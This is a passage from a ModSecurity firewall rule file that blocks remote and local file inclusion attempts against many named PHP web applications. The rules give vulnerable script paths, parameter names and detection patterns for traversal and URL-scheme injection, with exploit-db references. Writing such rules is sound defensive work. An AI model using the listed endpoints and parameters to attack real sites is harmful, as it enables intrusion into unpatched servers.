"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LaVague Remote Inclusion Attempt -- printbar.php views_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /locms/smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010023,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9015/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:cwd "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010024) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /locms/smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010024,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9015/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cwd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011000) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Worksystems linkbar.php cfile Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /smallaxe-0.3.1/inc/linkbar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011000,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Worksystems linkbar.php cfile Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10676'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cfile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Worksystems linkbar.php cfile Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008897) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Remote File Inclusion SecRule REQUEST_LINE "@contains /snippet.reflect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008897,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7204/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:reflect_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion SecRule REQUEST_LINE "@contains /snippet.reflect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008898,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7204/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:reflect_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor getid3.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /velid3/getid3.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011062,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor getid3.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:determined_format[include]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor getid3.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011063) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor module.archive.gzip.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /velid3/module.archive.gzip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011063,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor module.archive.gzip.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:determined_format[include]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor module.archive.gzip.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010223) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/Cache/Lite/Output.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010223,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/29716/info'" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011259) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/file_manager/special.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011259,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9350/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:fm_includes_special/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009888) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (1) SecRule REQUEST_LINE "@contains /includes/InstantSite/inc.is_root.php?is_projectPath=http|3a|" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009888,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (1) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (1) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009889) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (2) SecRule REQUEST_LINE "@contains /classes/class.Tree.php?GLOBALS[thCMS_root]=http|3a|" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009889,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (2) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (2) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009890) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (3) SecRule REQUEST_LINE "@contains /classes/class.thcsm_user.php?is_path=http|3a|" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009890,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (3) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (3) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009891) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (4) SecRule REQUEST_LINE "@contains /modul/mod.users.php?thCMS_root=http|3a|" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009891,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (4) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (4) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003331) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Generic membreManager.php remote file include SecRule REQUEST_LINE "@contains /membres/membreManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003331,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Generic membreManager.php remote file include',tag:'web-application-attack',tag:'bugtraq,22287'" SecRule QUERY_STRING|REQUEST_BODY "(?i:include_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Generic membreManager.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009141) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MiNBank utdb_access.php minsoft_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /utdb_access.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009141,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MiNBank utdb_access.php minsoft_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31492'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:minsoft_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MiNBank utdb_access.php minsoft_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009142) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MiNBank utgn_message.php minsoft_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /utgn_message.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009142,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MiNBank utgn_message.php minsoft_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31492'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:minsoft_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MiNBank utgn_message.php minsoft_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003717) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS miplex2 Remote Inclusion SmartyFU.class.php system SecRule REQUEST_LINE "@contains /lib/smarty/SmartyFU.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003717,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS miplex2 Remote Inclusion SmartyFU.class.php system',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3878'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS miplex2 Remote Inclusion SmartyFU.class.php system',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008900) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill export_batch.inc.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /export_batch.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008900,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill export_batch.inc.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill export_batch.inc.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008901) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill run_auto_suspend.cron.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /run_auto_suspend.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008901,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill run_auto_suspend.cron.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill run_auto_suspend.cron.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008902) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill send_email_cache.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /send_email_cache.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008902,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill send_email_cache.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill send_email_cache.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008903) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill 2checkout_return.inc.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /2checkout_return.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008903,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill 2checkout_return.inc.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill 2checkout_return.inc.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill nettools.popup.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /nettools.popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008904,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill nettools.popup.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill nettools.popup.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009437,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dirn "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009430,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion SecRule REQUEST_LINE "@contains /include/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pfad/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009330) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /centre.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009330,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6846/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:padmin "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010631) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /infusions/last_seen_users_panel/last_seen_users_panel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010631,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9018/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[locale] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009905) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /forum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009905,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8841/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[UTE][__tplCollection][a][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /news_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009431,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5429/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:newsoffice_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /news_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009432,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5429/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:newsoffice_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS News Manager ch_readalso.php read_xml_include Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /ch_readalso.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010099,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS News Manager ch_readalso.php read_xml_include Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29251'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:read_xml_include/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS News Manager ch_readalso.php read_xml_include Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nitrotech common.php root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008922,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Nitrotech common.php root Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nitrotech common.php root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003694) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NoAH Remote Inclusion Attempt -- mfa_theme.php tpls SecRule REQUEST_LINE "@contains /modules/noevents/templates/mfa_theme.php" 